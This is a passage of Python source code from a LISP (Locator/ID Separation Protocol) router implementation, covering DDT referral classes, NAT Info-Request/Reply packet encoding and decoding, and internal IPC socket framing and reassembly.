def lookup_source_cache(self, source, exact):
if (self.source_cache == None): return(None)
return(self.source_cache.lookup_cache(source, exact))
#enddef
def is_star_g(self):
if (self.group.is_null()): return(False)
return(self.eid.is_exact_match(self.group))
#enddef
#endclass
class lisp_ddt_node(object):
def __init__(self):
self.delegate_address = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.public_key = ""
self.map_server_peer = False
self.map_server_child = False
self.priority = 0
self.weight = 0
#enddef
def print_node_type(self):
if (self.is_ddt_child()): return("ddt-child")
if (self.is_ms_child()): return("map-server-child")
if (self.is_ms_peer()): return("map-server-peer")
#enddef
def is_ddt_child(self):
if (self.map_server_child): return(False)
if (self.map_server_peer): return(False)
return(True)
#enddef
def is_ms_child(self):
return(self.map_server_child)
#enddef
def is_ms_peer(self):
return(self.map_server_peer)
#enddef
#endclass
#
# This is a Map-Request queue used on a Map-Resolver when waiting for a
# Map-Referral to be returned by a DDT-node or a Map-Server.
#
class lisp_ddt_map_request(object):
def __init__(self, lisp_sockets, packet, eid, group, nonce):
self.uptime = lisp_get_timestamp()
self.lisp_sockets = lisp_sockets
self.packet = packet
self.eid = eid
self.group = group
self.nonce = nonce
self.mr_source = None
self.sport = 0
self.itr = None
self.retry_count = 0
self.send_count = 0
self.retransmit_timer = None
self.last_request_sent_to = None
self.from_pitr = False
self.tried_root = False
self.last_cached_prefix = [None, None]
#enddef
def print_ddt_map_request(self):
lprint("Queued Map-Request from {}ITR {}->{}, nonce 0x{}".format( \
"P" if self.from_pitr else "",
red(self.itr.print_address(), False),
green(self.eid.print_address(), False), lisp_hex_string(self.nonce)))
#enddef
def queue_map_request(self):
self.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [self])
self.retransmit_timer.start()
lisp_ddt_map_requestQ[str(self.nonce)] = self
#enddef
def dequeue_map_request(self):
self.retransmit_timer.cancel()
if (str(self.nonce) in lisp_ddt_map_requestQ):
lisp_ddt_map_requestQ.pop(str(self.nonce))
#endif
#enddef
def print_eid_tuple(self):
return(lisp_print_eid_tuple(self.eid, self.group))
#enddef
#endclass
#
# -------------------------------------------------------------------
# Type (Action field) Incomplete Referral-set TTL values
# -------------------------------------------------------------------
# 0 NODE-REFERRAL NO YES 1440
#
# 1 MS-REFERRAL NO YES 1440
#
# 2 MS-ACK * * 1440
#
# 3 MS-NOT-REGISTERED * * 1
#
# 4 DELEGATION-HOLE NO NO 15
#
# 5 NOT-AUTHORITATIVE YES NO 0
# -------------------------------------------------------------------
#
LISP_DDT_ACTION_SITE_NOT_FOUND = -2
LISP_DDT_ACTION_NULL = -1
LISP_DDT_ACTION_NODE_REFERRAL = 0
LISP_DDT_ACTION_MS_REFERRAL = 1
LISP_DDT_ACTION_MS_ACK = 2
LISP_DDT_ACTION_MS_NOT_REG = 3
LISP_DDT_ACTION_DELEGATION_HOLE = 4
LISP_DDT_ACTION_NOT_AUTH = 5
LISP_DDT_ACTION_MAX = LISP_DDT_ACTION_NOT_AUTH
lisp_map_referral_action_string = [
"node-referral", "ms-referral", "ms-ack", "ms-not-registered",
"delegation-hole", "not-authoritative"]
#
# Info-Request/Reply
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# |Type=7 |R| Reserved |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Nonce . . . |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | . . . Nonce |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Key ID | Authentication Data Length |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# ~ Authentication Data ~
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | TTL |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Reserved | EID mask-len | EID-prefix-AFI |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | EID-prefix |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Request specific information follows the EID-prefix, which has
# EID-prefix-AFI set to 0. The EID appended below is either a hostname
# (AFI=17) or nothing (AFI=0):
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 17 | <hostname--null-terminated> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 0 | <Nothing Follows AFI=0> |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# Info-Reply specific information following the EID-prefix:
#
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = 16387 | Rsvd1 | Flags |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | Type = 7 | Rsvd2 | 4 + n |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# N | MS UDP Port Number | ETR UDP Port Number |
# A +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# T | AFI = x | Global ETR RLOC Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# L | AFI = x | MS RLOC Address ... |
# C +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# A | AFI = x | Private ETR RLOC Address ... |
# F +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address 1 ... |
# | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | | AFI = x | RTR RLOC Address n ... |
# +->+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# This encoding will not use authentication so we respond to anyone who
# sends an Info-Request. And the EID-prefix will have AFI=0.
#
class lisp_info(object):
def __init__(self):
self.info_reply = False
self.nonce = 0
self.private_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_etr_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.global_ms_rloc = lisp_address(LISP_AFI_NONE, "", 0, 0)
self.ms_port = 0
self.etr_port = 0
self.rtr_list = []
self.hostname = lisp_hostname
#enddef
def print_info(self):
if (self.info_reply):
req_or_reply = "Info-Reply"
rloc = (", ms-port: {}, etr-port: {}, global-rloc: {}, " + \
"ms-rloc: {}, private-rloc: {}, RTR-list: ").format( \
self.ms_port, self.etr_port,
red(self.global_etr_rloc.print_address_no_iid(), False),
red(self.global_ms_rloc.print_address_no_iid(), False),
red(self.private_etr_rloc.print_address_no_iid(), False))
if (len(self.rtr_list) == 0): rloc += "empty, "
for rtr in self.rtr_list:
rloc += red(rtr.print_address_no_iid(), False) + ", "
#endfor
rloc = rloc[0:-2]
else:
req_or_reply = "Info-Request"
hostname = "<none>" if self.hostname == None else self.hostname
rloc = ", hostname: {}".format(blue(hostname, False))
#endif
lprint("{} -> nonce: 0x{}{}".format(bold(req_or_reply, False),
lisp_hex_string(self.nonce), rloc))
#enddef
def encode(self):
first_long = (LISP_NAT_INFO << 28)
if (self.info_reply): first_long |= (1 << 27)
#
# Encode first-long, nonce, key-id longword, TTL and EID mask-len/
# EID-prefix AFI. There is no auth data field since auth len is 0.
# Zero out key-id, auth-data-len, ttl, reserved, eid-mask-len, and
# eid-prefix-afi.
#
packet = struct.pack("I", socket.htonl(first_long))
packet += struct.pack("Q", self.nonce)
packet += struct.pack("III", 0, 0, 0)
#
# Add hostname null terminated string with AFI 17.
#
if (self.info_reply == False):
if (self.hostname == None):
packet += struct.pack("H", 0)
else:
packet += struct.pack("H", socket.htons(LISP_AFI_NAME))
packet += (self.hostname + "\0").encode()
#endif
return(packet)
#endif
#
# If Info-Reply, encode Type 7 LCAF.
#
afi = socket.htons(LISP_AFI_LCAF)
lcaf_type = LISP_LCAF_NAT_TYPE
lcaf_len = socket.htons(16)
ms_port = socket.htons(self.ms_port)
etr_port = socket.htons(self.etr_port)
packet += struct.pack("HHBBHHHH", afi, 0, lcaf_type, 0, lcaf_len,
ms_port, etr_port, socket.htons(self.global_etr_rloc.afi))
packet += self.global_etr_rloc.pack_address()
packet += struct.pack("HH", 0, socket.htons(self.private_etr_rloc.afi))
packet += self.private_etr_rloc.pack_address()
if (len(self.rtr_list) == 0): packet += struct.pack("H", 0)
#
# Encode RTR list.
#
for rtr in self.rtr_list:
packet += struct.pack("H", socket.htons(rtr.afi))
packet += rtr.pack_address()
#endfor
return(packet)
#enddef
def decode(self, packet):
orig_packet = packet
packet_format = "I"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
first_long = struct.unpack(packet_format, packet[:format_size])
first_long = first_long[0]
packet = packet[format_size::]
packet_format = "Q"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
nonce = struct.unpack(packet_format, packet[:format_size])
first_long = socket.ntohl(first_long)
self.nonce = nonce[0]
self.info_reply = first_long & 0x08000000
self.hostname = None
packet = packet[format_size::]
#
# Parse key-id, auth-len, auth-data, and EID-record. We don't support
# any of these. On encode, we set 3 longs worth of 0.
#
packet_format = "HH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# If an LCAF value appears in the key-id field, then this is an
# old style Echo-Reply (that NX-OS implemented).
#
key_id, auth_len = struct.unpack(packet_format, packet[:format_size])
if (auth_len != 0): return(None)
packet = packet[format_size::]
packet_format = "IBBH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
ttl, rsvd, ml, eid_afi = struct.unpack(packet_format,
packet[:format_size])
if (eid_afi != 0): return(None)
packet = packet[format_size::]
#
# Check if name supplied.
#
if (self.info_reply == False):
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
if (socket.ntohs(afi) == LISP_AFI_NAME):
packet = packet[format_size::]
packet, self.hostname = lisp_decode_dist_name(packet)
#endif
#endif
return(orig_packet)
#endif
#
# Process Info-Reply.
#
packet_format = "HHBBHHH"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
afi, x, lcaf_type, rsvd, lcaf_len, ms_port, etr_port = \
struct.unpack(packet_format, packet[:format_size])
if (socket.ntohs(afi) != LISP_AFI_LCAF): return(None)
self.ms_port = socket.ntohs(ms_port)
self.etr_port = socket.ntohs(etr_port)
packet = packet[format_size::]
#
# Get addresses one AFI at a time.
#
packet_format = "H"
format_size = struct.calcsize(packet_format)
if (len(packet) < format_size): return(None)
#
# Get global ETR RLOC address.
#
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_etr_rloc.afi = socket.ntohs(afi)
packet = self.global_etr_rloc.unpack_address(packet)
if (packet == None): return(None)
self.global_etr_rloc.mask_len = \
self.global_etr_rloc.host_mask_len()
#endif
#
# Get global MS RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.global_ms_rloc.afi = socket.ntohs(afi)
packet = self.global_ms_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.global_ms_rloc.mask_len = self.global_ms_rloc.host_mask_len()
#endif
#
# Get private ETR RLOC address.
#
if (len(packet) < format_size): return(orig_packet)
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi != 0):
self.private_etr_rloc.afi = socket.ntohs(afi)
packet = self.private_etr_rloc.unpack_address(packet)
if (packet == None): return(orig_packet)
self.private_etr_rloc.mask_len = \
self.private_etr_rloc.host_mask_len()
#endif
#
# Get RTR list if any.
#
while (len(packet) >= format_size):
afi = struct.unpack(packet_format, packet[:format_size])[0]
packet = packet[format_size::]
if (afi == 0): continue
rtr = lisp_address(socket.ntohs(afi), "", 0, 0)
packet = rtr.unpack_address(packet)
if (packet == None): return(orig_packet)
rtr.mask_len = rtr.host_mask_len()
self.rtr_list.append(rtr)
#endwhile
return(orig_packet)
#enddef
#endclass
class lisp_nat_info(object):
def __init__(self, addr_str, hostname, port):
self.address = addr_str
self.hostname = hostname
self.port = port
self.uptime = lisp_get_timestamp()
#enddef
def timed_out(self):
elapsed = time.time() - self.uptime
return(elapsed >= (LISP_INFO_INTERVAL * 2))
#enddef
#endclass
class lisp_info_source(object):
def __init__(self, hostname, addr_str, port):
self.address = lisp_address(LISP_AFI_IPV4, addr_str, 32, 0)
self.port = port
self.uptime = lisp_get_timestamp()
self.nonce = None
self.hostname = hostname
self.no_timeout = False
#enddef
def cache_address_for_info_source(self):
key = self.address.print_address_no_iid() + self.hostname
lisp_info_sources_by_address[key] = self
#enddef
def cache_nonce_for_info_source(self, nonce):
self.nonce = nonce
lisp_info_sources_by_nonce[nonce] = self
#enddef
#endclass
#------------------------------------------------------------------------------
#
# lisp_concat_auth_data
#
# Take each longword, byte-swap it when running on x86, and convert it to a
# hex string, zero-filling any longword that leads with 0.
#
def lisp_concat_auth_data(alg_id, auth1, auth2, auth3, auth4):
if (lisp_is_x86()):
if (auth1 != ""): auth1 = byte_swap_64(auth1)
if (auth2 != ""): auth2 = byte_swap_64(auth2)
if (auth3 != ""):
if (alg_id == LISP_SHA_1_96_ALG_ID): auth3 = socket.ntohl(auth3)
else: auth3 = byte_swap_64(auth3)
#endif
if (auth4 != ""): auth4 = byte_swap_64(auth4)
#endif
if (alg_id == LISP_SHA_1_96_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(8)
auth_data = auth1 + auth2 + auth3
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
auth1 = lisp_hex_string(auth1)
auth1 = auth1.zfill(16)
auth2 = lisp_hex_string(auth2)
auth2 = auth2.zfill(16)
auth3 = lisp_hex_string(auth3)
auth3 = auth3.zfill(16)
auth4 = lisp_hex_string(auth4)
auth4 = auth4.zfill(16)
auth_data = auth1 + auth2 + auth3 + auth4
#endif
return(auth_data)
#enddef
#
# lisp_open_listen_socket
#
# Open either internal socket or network socket. If network socket, it will
# open it with a local address of 0::0 which means the one socket can be
# used for IPv4 or IPv6. This is goodness and reduces the number of threads
# required.
#
def lisp_open_listen_socket(local_addr, port):
if (port.isdigit()):
if (local_addr.find(".") != -1):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (local_addr.find(":") != -1):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
sock.bind((local_addr, int(port)))
else:
name = port
if (os.path.exists(name)):
os.system("rm " + name)
time.sleep(1)
#endif
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(name)
#endif
return(sock)
#enddef
#
# lisp_open_send_socket
#
# Open socket for sending to port 4342.
#
def lisp_open_send_socket(internal_name, afi):
if (internal_name == ""):
if (afi == LISP_AFI_IPV4):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
#endif
if (afi == LISP_AFI_IPV6):
if (lisp_is_raspbian()): return(None)
sock = socket.socket(socket.AF_INET6, socket.SOCK_DGRAM)
#endif
else:
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
sock.bind(internal_name)
#endif
return(sock)
#enddef
#
# lisp_close_socket
#
# Close network and internal sockets.
#
def lisp_close_socket(sock, internal_name):
sock.close()
if (os.path.exists(internal_name)): os.system("rm " + internal_name)
return
#enddef
#
# lisp_is_running
#
# Test if one of "lisp-itr", "lisp-etr", "lisp-mr", "lisp-ms", "lisp-ddt", or
# "lisp-core" is running.
#
def lisp_is_running(node):
return(True if (os.path.exists(node)) else False)
#enddef
#
# lisp_packet_ipc
#
# Build IPC message for a LISP control packet destined for UDP port 4342. This
# packet goes to the lisp-core process and then it IPCs it to the appropriate
# LISP component process.
#
# Returns a byte string.
#
def lisp_packet_ipc(packet, source, sport):
header = "packet@{}@{}@{}@".format(str(len(packet)), source, str(sport))
return(header.encode() + packet)
#enddef
#
# lisp_control_packet_ipc
#
# Build IPC message for a packet that needs to be sourced from UDP port 4342.
# Always sent by a LISP component process to the lisp-core process.
#
# Returns a byte string.
#
def lisp_control_packet_ipc(packet, source, dest, dport):
header = "control-packet@{}@{}@".format(dest, str(dport))
return(header.encode() + packet)
#enddef
#
# lisp_data_packet_ipc
#
# Build IPC message for a MAC, IPv4, or IPv6 data packet.
#
# Returns a byte string.
#
def lisp_data_packet_ipc(packet, source):
header = "data-packet@{}@{}@@".format(str(len(packet)), source)
return(header.encode() + packet)
#enddef
#
# lisp_command_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "ipc" is a string.
#
def lisp_command_ipc(ipc, source):
packet = "command@{}@{}@@".format(len(ipc), source) + ipc
return(packet.encode())
#enddef
#
# lisp_api_ipc
#
# Build IPC message for a command message. Note this command IPC message must
# have same number of parameters as the "packet@" IPC. So an intentional
# double @ is put in after the source to indicate a null port.
#
# Returns a byte string. Variable "data" is a string.
#
def lisp_api_ipc(source, data):
packet = "api@" + str(len(data)) + "@" + source + "@@" + data
return(packet.encode())
#enddef
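#
# A minimal sketch (hypothetical helper, not used by the code) of how a
# receiver can split the length-prefixed framings built by
# lisp_packet_ipc(), lisp_data_packet_ipc(), lisp_command_ipc(), and
# lisp_api_ipc(). The maxsplit of 4 keeps any "@" bytes inside the
# payload intact; the real receive path in lisp_receive() cannot rely
# on this because messages may arrive in segments, which is why it
# needs lisp_bit_stuff(). Note that lisp_control_packet_ipc() uses a
# shorter header and would not parse this way.
#
def lisp_sketch_parse_ipc(message):
    opcode, length, source, port, payload = message.split(b"@", 4)
    return(opcode.decode(), int(length), source.decode(), port.decode(),
        payload)
#enddef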
#
# lisp_ipc
#
# Send IPC message to internal AF_UNIX socket if LISP component is running. We
# need to send in segments (1500 or 9000 bytes, see below) since the socket
# interface will not accept larger messages, and socket.setsockopt() won't
# allow us to increase SO_SNDBUF.
#
# Variable "packet" is of type byte string. Caller must adhere. Since packet
# is going out a socket interface (even if internal).
#
def lisp_ipc(packet, send_socket, node):
#
# Can't send an IPC message to a process that is not running.
#
if (lisp_is_running(node) == False):
lprint("Suppress sending IPC to {}".format(node))
return
#endif
ipc_len = 1500 if (packet.find(b"control-packet") == -1) else 9000
offset = 0
length = len(packet)
retry_count = 0
sleep_time = .001
while (length > 0):
segment_len = min(length, ipc_len)
segment = packet[offset:segment_len+offset]
try:
if (type(segment) == str): segment = segment.encode()
send_socket.sendto(segment, node)
lprint("Send IPC {}-out-of-{} byte to {} succeeded".format( \
len(segment), len(packet), node))
retry_count = 0
sleep_time = .001
except socket.error as e:
if (retry_count == 12):
lprint("Giving up on {}, consider it down".format(node))
break
#endif
lprint("Send IPC {}-out-of-{} byte to {} failed: {}".format( \
len(segment), len(packet), node, e))
retry_count += 1
time.sleep(sleep_time)
lprint("Retrying after {} ms ...".format(sleep_time * 1000))
sleep_time *= 2
continue
#endtry
offset += segment_len
length -= segment_len
#endwhile
return
#enddef
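#
# For example, a 20000-byte non-control IPC message goes out as
# fourteen sendto() calls: thirteen full 1500-byte segments plus a
# final 500-byte segment. A "control-packet" message uses 9000-byte
# segments instead.
#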
#
# lisp_format_packet
#
# Put a whitespace between every 4 bytes of a packet dump. Returns string
# and not byte string like supplied "packet" type.
#
def lisp_format_packet(packet):
packet = binascii.hexlify(packet)
offset = 0
new = b""
length = len(packet) * 2
while (offset < length):
new += packet[offset:offset+8] + b" "
offset += 8
length -= 4
#endwhile
return(new.decode())
#enddef
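#
# For example, lisp_format_packet(b"\x12\x34\x56\x78\x9a\xbc\xde\xf0")
# returns "12345678 9abcdef0" (modulo trailing whitespace).
#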
#
# lisp_send
#
# Send packet out.
#
def lisp_send(lisp_sockets, dest, port, packet):
lisp_socket = lisp_sockets[0] if dest.is_ipv4() else lisp_sockets[1]
#
# Remove square brackets. Use an IPv4 socket when address is IPv4, even
# when embedded in ::ffff:<ipv4-address>. This is a special case when
# an RTR sits behind a NAT and is sending a Map-Request. The ECM and
# Map-Request need to use the same ephemeral port and the Map-Reply
# needs to come to the ephemeral listening socket lisp_sockets[0];
#
# Also, on getchip and raspberry-pi OSes, there is no support for IPv6
# sockets, so we need to use the IPv4 embedded address and the IPv4
# socket.
#
address = dest.print_address_no_iid()
if (address.find("::ffff:") != -1 and address.count(".") == 3):
if (lisp_i_am_rtr): lisp_socket = lisp_sockets[0]
if (lisp_socket == None):
lisp_socket = lisp_sockets[0]
address = address.split("::ffff:")[-1]
#endif
#endif
lprint("{} {} bytes {} {}, packet: {}".format(bold("Send", False),
len(packet), bold("to " + address, False), port,
lisp_format_packet(packet)))
#
# Send on socket.
#
try:
lisp_socket.sendto(packet, (address, port))
except socket.error as e:
lprint("socket.sendto() failed: {}".format(e))
#endtry
return
#enddef
#
# lisp_receive_segments
#
# Process 1500-byte segments when the received IPC packet is larger than what
# the socket can deliver in one recvfrom() call.
#
def lisp_receive_segments(lisp_socket, packet, source, total_length):
#
# If the total length is equal to the segment length. We only have one
# segment which is the packet. Return it.
#
segment_len = total_length - len(packet)
if (segment_len == 0): return([True, packet])
lprint("Received {}-out-of-{} byte segment from {}".format(len(packet),
total_length, source))
#
# Otherwise, receive each segment and assemble it to return entire packet
# to caller.
#
length = segment_len
while (length > 0):
try: segment = lisp_socket.recvfrom(9000)
except: return([False, None])
segment = segment[0]
#
# The sender gave up and sent a new message that made it to us, last
# partial packet must be dropped.
#
seg = segment.decode()
if (seg.find("packet@") == 0):
seg = seg.split("@")
lprint("Received new message ({}-out-of-{}) while receiving " + \
"fragments, old message discarded", len(segment),
seg[1] if len(seg) > 2 else "?")
return([False, segment])
#endif
length -= len(segment)
packet += segment
lprint("Received {}-out-of-{} byte segment from {}".format( \
len(segment), total_length, source))
#endwhile
return([True, packet])
#enddef
#
# lisp_bit_stuff
#
# Re-join the array elements with a 0x40 ("@") byte between them. This is a
# bit-stuffing procedure that restores the "@" payload bytes which split()
# consumed as field separators. Caller passes a list of byte strings.
#
def lisp_bit_stuff(payload):
lprint("Bit-stuffing, found {} segments".format(len(payload)))
packet = b""
for segment in payload: packet += segment + b"\x40"
return(packet[:-1])
#enddef
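#
# A minimal sketch (illustration only) of the problem lisp_bit_stuff()
# solves: payload bytes of 0x40 are indistinguishable from the "@"
# field separators, so split() shreds them and the join above glues
# them back. This function is hypothetical and returns True.
#
def lisp_sketch_bit_stuff_roundtrip():
    payload = b"\x40\x01\x02\x40\x03"
    message = b"command@5@lisp-itr@@" + payload
    fields = message.split(b"@")
    return(lisp_bit_stuff(fields[4::]) == payload)
#enddef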
#
# lisp_receive
#
# Wait for packet to come in. This function call will block. For command
# IPCs, we need to loop to assemble all segments.
#
# For an internal socket, the format of a recvfrom() 'packet-data' is:
#
# "command" @ <total-length> @ <source> @ <packet-buffer>
# "packet" @ <total-length> @ <source> @ <command-buffer>
#
# So when an array of length 4 does not exist, we are receiving a fragment.
#
# For an external network socket, the format of a recvfrom() is:
#
# packet_data[0] = <packet-buffer>
# packet_data[1] = [<source>, <port>]
#
def lisp_receive(lisp_socket, internal):
while (True):
#
# Read from socket. Return if we received an error.
#
try: packet_data = lisp_socket.recvfrom(9000)
except: return(["", "", "", ""])
#
# This is a packet received on the network. If it was fragmented at the
# sender, then IP did it so it is assembled into a complete datagram
# in this system.
#
if (internal == False):
packet = packet_data[0]
source = lisp_convert_6to4(packet_data[1][0])
port = packet_data[1][1]
if (port == LISP_DATA_PORT):
do_log = lisp_data_plane_logging
packet_str = lisp_format_packet(packet[0:60]) + " ..."
else:
do_log = True
packet_str = lisp_format_packet(packet)
#endif
if (do_log):
lprint("{} {} bytes {} {}, packet: {}".format(bold("Receive",
False), len(packet), bold("from " + source, False), port,
packet_str))
#endif
return(["packet", source, port, packet])
#endif
#
# This is an IPC message that can be fragmented by lisp-core or the
# sending socket interface.
#
assembled = False
data = packet_data[0]
if (type(data) == str): data = data.encode()
loop = False
while (assembled == False):
data = data.split(b"@")
if (len(data) < 4):
lprint("Possible fragment (length {}), from old message, " + \
"discarding", len(data[0]))
loop = True
break
#endif
opcode = data[0].decode()
try:
total_length = int(data[1])
except:
error_str = bold("Internal packet reassembly error", False)
lprint("{}: {}".format(error_str, packet_data))
loop = True
break
#endtry
source = data[2].decode()
port = data[3].decode()
#
# If any of the data payload has a 0x40 byte (which is "@" in
# ascii), we will confuse the IPC separator from real data.
# So go to the payload and put in 0x40 where split() separated
# the data. This particularly happens with Map-Notify messages
# since the first byte of the message is 0x40.
#
if (len(data) > 5):
packet = lisp_bit_stuff(data[4::])
else:
packet = data[4]
#endif
#
# Check for reassembly. Once reassembled, then we can process one
# large packet.
#
assembled, packet = lisp_receive_segments(lisp_socket, packet,
source, total_length)
if (packet == None): return(["", "", "", ""])
#
# We did not finish assembling a message but the sender sent a new
# one.
#
if (assembled == False):
data = packet
continue
#endif
if (port == ""): port = "no-port"
if (opcode == "command" and lisp_i_am_core == False):
index = packet.find(b" {")
command = packet if index == -1 else packet[:index]
command = ": '" + command.decode() + "'"
else:
command = ""
#endif
lprint("{} {} bytes {} {}, {}{}".format(bold("Receive", False),
len(packet), bold("from " + source, False), port, opcode,
command if (opcode in ["command", "api"]) else ": ... " if \
(opcode == "data-packet") else \
": " + lisp_format_packet(packet)))
#endif
#endwhile
if (loop): continue
return([opcode, source, port, packet])
#endwhile
#enddef
#
# lisp_parse_packet
#
# Parse LISP control message.
#
def lisp_parse_packet(lisp_sockets, packet, source, udp_sport, ttl=-1):
trigger_flag = False
timestamp = time.time()
header = lisp_control_header()
if (header.decode(packet) == None):
lprint("Could not decode control header")
return(trigger_flag)
#endif
#
# Store source in internal lisp_address() format.
#
from_ipc = source
if (source.find("lisp") == -1):
s = lisp_address(LISP_AFI_NONE, "", 0, 0)
s.string_to_afi(source)
s.store_address(source)
source = s
#endif
if (header.type == LISP_MAP_REQUEST):
lisp_process_map_request(lisp_sockets, packet, None, 0, source,
udp_sport, False, ttl, timestamp)
elif (header.type == LISP_MAP_REPLY):
lisp_process_map_reply(lisp_sockets, packet, source, ttl, timestamp)
elif (header.type == LISP_MAP_REGISTER):
lisp_process_map_register(lisp_sockets, packet, source, udp_sport)
elif (header.type == LISP_MAP_NOTIFY):
if (from_ipc == "lisp-etr"):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-rtr")):
lisp_process_multicast_map_notify(packet, source)
elif (lisp_is_running("lisp-itr")):
lisp_process_unicast_map_notify(lisp_sockets, packet, source)
#endif
elif (header.type == LISP_MAP_NOTIFY_ACK):
lisp_process_map_notify_ack(packet, source)
elif (header.type == LISP_MAP_REFERRAL):
lisp_process_map_referral(lisp_sockets, packet, source)
elif (header.type == LISP_NAT_INFO and header.is_info_reply()):
x, y, trigger_flag = lisp_process_info_reply(source, packet, True)
elif (header.type == LISP_NAT_INFO and header.is_info_reply() == False):
addr_str = source.print_address_no_iid()
lisp_process_info_request(lisp_sockets, packet, addr_str, udp_sport,
None)
elif (header.type == LISP_ECM):
lisp_process_ecm(lisp_sockets, packet, source, udp_sport)
else:
lprint("Invalid LISP control packet type {}".format(header.type))
#endif
return(trigger_flag)
#enddef
#
# lisp_process_rloc_probe_request
#
# Process Map-Request with RLOC-probe bit set.
#
def lisp_process_rloc_probe_request(lisp_sockets, map_request, source, port,
ttl, timestamp):
p = bold("RLOC-probe", False)
if (lisp_i_am_etr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_etr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
if (lisp_i_am_rtr):
lprint("Received {} Map-Request, send RLOC-probe Map-Reply".format(p))
lisp_rtr_process_map_request(lisp_sockets, map_request, source, port,
ttl, timestamp)
return
#endif
lprint("Ignoring received {} Map-Request, not an ETR or RTR".format(p))
return
#enddef
#
# lisp_process_smr
#
def lisp_process_smr(map_request):
lprint("Received SMR-based Map-Request")
return
#enddef
#
# lisp_process_smr_invoked_request
#
def lisp_process_smr_invoked_request(map_request):
lprint("Received SMR-invoked Map-Request")
return
#enddef
#
# lisp_build_map_reply
